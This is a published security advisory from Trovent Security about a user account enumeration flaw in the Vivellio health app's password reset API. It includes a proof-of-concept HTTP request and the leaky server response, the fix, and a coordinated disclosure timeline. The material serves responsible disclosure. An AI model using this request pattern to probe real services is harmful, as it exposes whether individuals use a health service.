# Trovent Security Advisory 2108-01 # ##################################### User account enumeration in password reset function ################################################### Overview ######## Advisory ID: TRSA-2108-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2108-01 Affected product: Vivellio Android mobile application (com.netural.vivellio) Tested versions: Vivellio 1.2.1 Vendor: blockhealth GmbH, https://www.vivellio.app Credits: Trovent Security GmbH, Karima Hebbal Detailed description #################### The Vivellio mobile application is used to store health information. Trovent Security GmbH discovered a user account enumeration vulnerability in the password reset function of the Vivellio mobile application. The Vivellio server API allows checking if a user with a specific email address is registered or not. Severity: Medium CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CWE ID: CWE-204 CVE ID: N/A Proof of concept ################ Sample HTTP request sent with a non-registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /user/reset-password HTTP/1.1 Host: app-gate.vivellio.app Accept: application/json Content-Type: application/json; charset=UTF-8 Content-Length: 28 Accept-Encoding: gzip, deflate User-Agent: okhttp/3.14.1 Connection: close {"email":"false@gmail.com"} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to an invalid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 404 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Content-Type: application/json;charset=UTF-8 Date: Mon, 30 Aug 2021 11:26:59 GMT Expires: 0 Pragma: no-cache Server: openresty/1.15.8.1 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: DENY X-XSS-Protection: 1; mode=block Content-Length: 1437 Connection: Close {"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"createPasswordResetProcess","fileName":"UserControllerImpl.java","lineNumber":539,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false}, {"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserControllerImpl.java","lineNumber":85,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false}, {"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserServiceImpl.java","lineNumber":52,"className":"ai.blockhealth.carify.user.service.UserServiceImpl","nativeMethod":false}, {"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserApi.java","lineNumber":61,"className":"ai.blockhealth.carify.user.UserApi","nativeMethod":false}, {"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"doFilterInternal","fileName":"VivellioRequestLogger.java","lineNumber":56,"className":"ai.blockhealth.carify.filter.VivellioRequestLogger","nativeMethod":false}], "message":"The email false@gmail.com could not be linked to an existing account.","suppressed":[],"localizedMessage":"The email false@gmail.com could not be linked to an existing account.","exceptionClass":"EmailNotFoundException" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### Ensure the application returns a consistent message for both existent and nonexistent accounts during the password reset process. Fixed in Vivellio server API, verified by Trovent. History ####### 2021-08-30: Vulnerability found & advisory created 2021-09-24: Vendor contacted 2021-09-27: Vendor replied 2021-12-18: Vendor reported that the vulnerability is fixed 2022-01-26: Trovent verified the fix of the vulnerability 2022-02-03: Advisory published